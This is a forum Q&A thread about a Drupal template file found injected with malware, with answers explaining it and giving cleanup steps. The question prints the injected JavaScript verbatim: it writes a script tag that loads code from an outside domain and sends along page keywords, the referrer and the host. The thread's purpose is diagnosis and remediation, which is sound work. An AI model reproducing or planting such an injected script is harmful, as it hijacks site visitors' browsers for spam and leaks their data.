# PHP malware inside this apparently clean file?

Tags: php, drupal, malware

I have a `PHP` file (`html.tpl.php`) inside a module for `Drupal`, with the following code:

```
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN"
  "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="<?php print $language->language; ?>" version="XHTML+RDFa 1.0" dir="<?php print $language->dir; ?>"<?php print $rdf_namespaces; ?>>

<head profile="<?php print $grddl_profile; ?>">
  <?php print $head; ?>
  <title><?php print $head_title; ?></title>
  <?php print $styles; ?>
  <?php print $scripts; ?>

<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="http://atelier24-gerd-kallhardt.de/js/jquery.min.php?c_utt=K85164&c_utm='+encodeURIComponent('http://atelier24-gerd-kallhardt.de/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}</script>
</head>
<body class="<?php print $classes; ?>" <?php print $attributes;?>>
  <div id="skip-link">
    <a href="#main-content" class="element-invisible element-focusable"><?php print t('Skip to main content'); ?></a>
  </div>
  <?php print $page_top; ?>
  <?php print $page; ?>
  <?php print $page_bottom; ?>
</body>
</html>
```

My problem is that some antiviruses flag it as a malware.

Please, check this [virustotal report](https://www.virustotal.com/en/file/3c50f242501fc6d37bd5444810354db04af59efb026654abe7b35c82d68383d5/analysis/1479950746/).

Could be this flag maybe because the `script` inclusion of:

`http://atelier24-gerd-kallhardt.de/js/jquery.min.php`?

The file `html.tpl.php` lives on: `/modules/system/` (Drupal website).

You can download this file from [here](https://filetea.me/t1sJEevBx7uRkxMfHhAoGVe5A/dl).

Then I have some **questions**:

- Is this a legitimate file (despite a possible infection)?
- It was infected?
- Is there good and bad (malware) code?
- How can I remove the bad part?, just by deleting that line of code, with: `script`?
- How this code could got attached there?

Comment: The answer seems to be "yes, you are infected", but the best people to ask might be at [security.se]?

Comment: Finally I downloaded a clean code from:
[https://www.drupal.org/project/drupal/releases/7.0](https://www.drupal.org/project/drupal/releases/7.0)
for the file: `/modules/system/html.tpl.php`

Answer (score 0, accepted):

That happened to me too. Some malware is searching for HTML opening file in dir structure I guess and found this one first. Luckily, the one that was really used, from my theme wasn't infected.

Search for that "atelier" text in all your files or some other string that came with this malware.

It's not specially bad, but just spammer.

Change all back-end admin and (S)FTP passwords and do backups on regular bases.

If you are on shared host..hmm...may be that some other website was hacked, not yours.

Answer (score 0):

To answer your questions:

> Is this a legitimate file (despite a possible infection)?

Yes, it's legitimate

> It was infected?

Yes, it was infected

> Is there good and bad (malware) code?

Malware is never good.

> How can I remove the bad part?, just by deleting that line of code, with: script?

Yes, but you haven't solved the problem of how it got there in the first place.

> How this code could got attached there?

What most likely happened, is that someone would have exploited some vulnerability in one of your outdated Drupal modules (or Drupal core) that allowed them to overwrite your html.tpl.php to include that script component.

To summarise what it's doing, that script tag is designed to make the browser of anyone who visits your site request a page from a completely different site. This kind of trick can be used to artificially inflate traffic numbers on other sites. Where it pays off for the author is in the fact that the other site's traffic figures will be artificially inflated.

This kind of tactic might be employed by people who charge people money to "drive traffic to their site", or by the site owner themselves, if they sell advertising on their webpage to other companies. The higher their traffic numbers, the more "exposure" advertisers get, the more money they could charge for advertising.

What you need to be concerned about is the fact that somewhere, there's a vulnerability on your site that allows people to overwrite files in your web folders however they want.

You need to do the following, or the problem will resurface:

- Put your site into maintenance mode by navigating to /admin/config/development/maintenance
- Back up your database and your web folder
- Update Drupal's core files following these instructions: https://www.drupal.org/docs/7/updating-your-drupal-site/how-to-update-drupal-core
- Update all your modules at /admin/modules/update/
- Run database updates
- Once confirming all module updates were successful, and assuming you don't get any errors, you can now turn maintenance mode off

Now, you also need to make sure you secure all your files and folders appropriately, by making sure that they're read-only (with the exception of where uploaded files are stored)

Then, assuming you're on your own server, you need to look into hardening whichever HTTP server you're using (Apache, Nginx, etc).

If you don't follow these steps, it's only a matter of time before some malware scans your server, finds the exact same vulnerability, and exploits it in a similar fashion.

Theoretically, you're lucky in that all it does is drive additional traffic to a different site. It could've been a lot worse.